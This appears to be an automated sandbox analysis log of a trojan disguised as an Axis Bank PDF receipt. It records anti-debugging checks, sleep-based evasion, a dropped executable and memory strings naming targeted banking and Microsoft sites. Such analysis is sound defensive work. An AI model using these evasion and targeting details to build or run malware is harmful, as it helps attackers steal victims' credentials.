Source: Yara match File source: Process Memory Space: OkLsTLaTTZVp.exe PID: 7096, type: MEMORYSTR
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 21C0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 2470000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 4470000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 7610000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 8610000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 88D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: 98D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 2CD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 2E50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 4E50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 7B40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory allocated: 8B40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC096E rdtsc 10_2_01AC096E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3092
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4242
Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 2156
Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 7815
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe API coverage: 1.3 %
Source: C:\Windows\SysWOW64\sc.exe API coverage: 2.6 %
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe TID: 1020 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7012 Thread sleep count: 3092 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7012 Thread sleep count: 187 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2360 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5880 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1216 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe TID: 5432 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\sc.exe TID: 4080 Thread sleep count: 2156 > 30
Source: C:\Windows\SysWOW64\sc.exe TID: 4080 Thread sleep time: -4312000s >= -30000s
Source: C:\Windows\SysWOW64\sc.exe TID: 4080 Thread sleep count: 7815 > 30
Source: C:\Windows\SysWOW64\sc.exe TID: 4080 Thread sleep time: -15630000s >= -30000s
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep time: -85000s >= -30000s
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep count: 40 > 30
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe TID: 3468 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B4CD50 FindFirstFileW,FindNextFileW,FindClose, 14_2_02B4CD50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 85664-rN9.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 85664-rN9.14.dr Binary or memory string: discord.comVMware20,11696487552f
Source: 85664-rN9.14.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 85664-rN9.14.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 85664-rN9.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000002.4520405729.0000000000900000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: 85664-rN9.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: sc.exe, 0000000E.00000002.4525388172.0000000008032000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20
Source: 85664-rN9.14.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: sc.exe, 0000000E.00000002.4513265527.0000000002F4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 85664-rN9.14.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 85664-rN9.14.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 85664-rN9.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 85664-rN9.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 85664-rN9.14.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 85664-rN9.14.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: sc.exe, 0000000E.00000002.4525388172.0000000008032000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs - HKVMware20,11696487552]
Source: 85664-rN9.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: sc.exe, 0000000E.00000002.4525388172.0000000008032000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,116
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 85664-rN9.14.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 85664-rN9.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 85664-rN9.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 85664-rN9.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 85664-rN9.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 85664-rN9.14.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\sc.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_00418BD3 LdrLoadDll, 10_2_00418BD3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC0185 mov eax, dword ptr fs:[00000030h] 10_2_01AC0185
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0019F mov eax, dword ptr fs:[00000030h] 10_2_01B0019F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7A197 mov eax, dword ptr fs:[00000030h] 10_2_01A7A197
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B24180 mov eax, dword ptr fs:[00000030h] 10_2_01B24180
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3C188 mov eax, dword ptr fs:[00000030h] 10_2_01B3C188
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B561E5 mov eax, dword ptr fs:[00000030h] 10_2_01B561E5
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB01F8 mov eax, dword ptr fs:[00000030h] 10_2_01AB01F8
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B461C3 mov eax, dword ptr fs:[00000030h] 10_2_01B461C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 10_2_01AFE1D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFE1D0 mov ecx, dword ptr fs:[00000030h] 10_2_01AFE1D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB0124 mov eax, dword ptr fs:[00000030h] 10_2_01AB0124
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B40115 mov eax, dword ptr fs:[00000030h] 10_2_01B40115
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2A118 mov ecx, dword ptr fs:[00000030h] 10_2_01B2A118
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2A118 mov eax, dword ptr fs:[00000030h] 10_2_01B2A118
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2E10E mov eax, dword ptr fs:[00000030h] 10_2_01B2E10E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2E10E mov ecx, dword ptr fs:[00000030h] 10_2_01B2E10E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B54164 mov eax, dword ptr fs:[00000030h] 10_2_01B54164
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B18158 mov eax, dword ptr fs:[00000030h] 10_2_01B18158
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7C156 mov eax, dword ptr fs:[00000030h] 10_2_01A7C156
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B14144 mov eax, dword ptr fs:[00000030h] 10_2_01B14144
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B14144 mov ecx, dword ptr fs:[00000030h] 10_2_01B14144
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A86154 mov eax, dword ptr fs:[00000030h] 10_2_01A86154
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A780A0 mov eax, dword ptr fs:[00000030h] 10_2_01A780A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B460B8 mov eax, dword ptr fs:[00000030h] 10_2_01B460B8
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B460B8 mov ecx, dword ptr fs:[00000030h] 10_2_01B460B8
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B180A8 mov eax, dword ptr fs:[00000030h] 10_2_01B180A8
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8208A mov eax, dword ptr fs:[00000030h] 10_2_01A8208A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A880E9 mov eax, dword ptr fs:[00000030h] 10_2_01A880E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7A0E3 mov ecx, dword ptr fs:[00000030h] 10_2_01A7A0E3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B060E0 mov eax, dword ptr fs:[00000030h] 10_2_01B060E0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7C0F0 mov eax, dword ptr fs:[00000030h] 10_2_01A7C0F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AC20F0 mov ecx, dword ptr fs:[00000030h] 10_2_01AC20F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B020DE mov eax, dword ptr fs:[00000030h] 10_2_01B020DE
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B16030 mov eax, dword ptr fs:[00000030h] 10_2_01B16030
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7A020 mov eax, dword ptr fs:[00000030h] 10_2_01A7A020
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7C020 mov eax, dword ptr fs:[00000030h] 10_2_01A7C020
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B04000 mov ecx, dword ptr fs:[00000030h] 10_2_01B04000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 mov eax, dword ptr fs:[00000030h] 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 mov eax, dword ptr fs:[00000030h] 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 mov eax, dword ptr fs:[00000030h] 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 mov eax, dword ptr fs:[00000030h] 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 mov eax, dword ptr fs:[00000030h] 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 mov eax, dword ptr fs:[00000030h] 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 mov eax, dword ptr fs:[00000030h] 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B22000 mov eax, dword ptr fs:[00000030h] 10_2_01B22000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9E016 mov eax, dword ptr fs:[00000030h] 10_2_01A9E016
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9E016 mov eax, dword ptr fs:[00000030h] 10_2_01A9E016
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9E016 mov eax, dword ptr fs:[00000030h] 10_2_01A9E016
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9E016 mov eax, dword ptr fs:[00000030h] 10_2_01A9E016
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAC073 mov eax, dword ptr fs:[00000030h] 10_2_01AAC073
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B06050 mov eax, dword ptr fs:[00000030h] 10_2_01B06050
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A82050 mov eax, dword ptr fs:[00000030h] 10_2_01A82050
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA438F mov eax, dword ptr fs:[00000030h] 10_2_01AA438F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA438F mov eax, dword ptr fs:[00000030h] 10_2_01AA438F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7E388 mov eax, dword ptr fs:[00000030h] 10_2_01A7E388
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7E388 mov eax, dword ptr fs:[00000030h] 10_2_01A7E388
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7E388 mov eax, dword ptr fs:[00000030h] 10_2_01A7E388
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A78397 mov eax, dword ptr fs:[00000030h] 10_2_01A78397
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A78397 mov eax, dword ptr fs:[00000030h] 10_2_01A78397
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A78397 mov eax, dword ptr fs:[00000030h] 10_2_01A78397
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A903E9 mov eax, dword ptr fs:[00000030h] 10_2_01A903E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A903E9 mov eax, dword ptr fs:[00000030h] 10_2_01A903E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A903E9 mov eax, dword ptr fs:[00000030h] 10_2_01A903E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A903E9 mov eax, dword ptr fs:[00000030h] 10_2_01A903E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A903E9 mov eax, dword ptr fs:[00000030h] 10_2_01A903E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A903E9 mov eax, dword ptr fs:[00000030h] 10_2_01A903E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A903E9 mov eax, dword ptr fs:[00000030h] 10_2_01A903E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A903E9 mov eax, dword ptr fs:[00000030h] 10_2_01A903E9
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB63FF mov eax, dword ptr fs:[00000030h] 10_2_01AB63FF
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9E3F0 mov eax, dword ptr fs:[00000030h] 10_2_01A9E3F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9E3F0 mov eax, dword ptr fs:[00000030h] 10_2_01A9E3F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A9E3F0 mov eax, dword ptr fs:[00000030h] 10_2_01A9E3F0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B243D4 mov eax, dword ptr fs:[00000030h] 10_2_01B243D4
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B243D4 mov eax, dword ptr fs:[00000030h] 10_2_01B243D4
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A3C0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A3C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A3C0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A3C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A3C0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A3C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A3C0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A3C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A3C0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A3C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A3C0 mov eax, dword ptr fs:[00000030h] 10_2_01A8A3C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A883C0 mov eax, dword ptr fs:[00000030h] 10_2_01A883C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A883C0 mov eax, dword ptr fs:[00000030h] 10_2_01A883C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A883C0 mov eax, dword ptr fs:[00000030h] 10_2_01A883C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A883C0 mov eax, dword ptr fs:[00000030h] 10_2_01A883C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2E3DB mov eax, dword ptr fs:[00000030h] 10_2_01B2E3DB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2E3DB mov eax, dword ptr fs:[00000030h] 10_2_01B2E3DB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2E3DB mov ecx, dword ptr fs:[00000030h] 10_2_01B2E3DB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2E3DB mov eax, dword ptr fs:[00000030h] 10_2_01B2E3DB
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B063C0 mov eax, dword ptr fs:[00000030h] 10_2_01B063C0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3C3CD mov eax, dword ptr fs:[00000030h] 10_2_01B3C3CD
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B58324 mov eax, dword ptr fs:[00000030h] 10_2_01B58324
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B58324 mov ecx, dword ptr fs:[00000030h] 10_2_01B58324
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B58324 mov eax, dword ptr fs:[00000030h] 10_2_01B58324
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B58324 mov eax, dword ptr fs:[00000030h] 10_2_01B58324
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABA30B mov eax, dword ptr fs:[00000030h] 10_2_01ABA30B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABA30B mov eax, dword ptr fs:[00000030h] 10_2_01ABA30B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABA30B mov eax, dword ptr fs:[00000030h] 10_2_01ABA30B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7C310 mov ecx, dword ptr fs:[00000030h] 10_2_01A7C310
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA0310 mov ecx, dword ptr fs:[00000030h] 10_2_01AA0310
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2437C mov eax, dword ptr fs:[00000030h] 10_2_01B2437C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B28350 mov ecx, dword ptr fs:[00000030h] 10_2_01B28350
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4A352 mov eax, dword ptr fs:[00000030h] 10_2_01B4A352
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0035C mov eax, dword ptr fs:[00000030h] 10_2_01B0035C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0035C mov eax, dword ptr fs:[00000030h] 10_2_01B0035C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0035C mov eax, dword ptr fs:[00000030h] 10_2_01B0035C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0035C mov ecx, dword ptr fs:[00000030h] 10_2_01B0035C
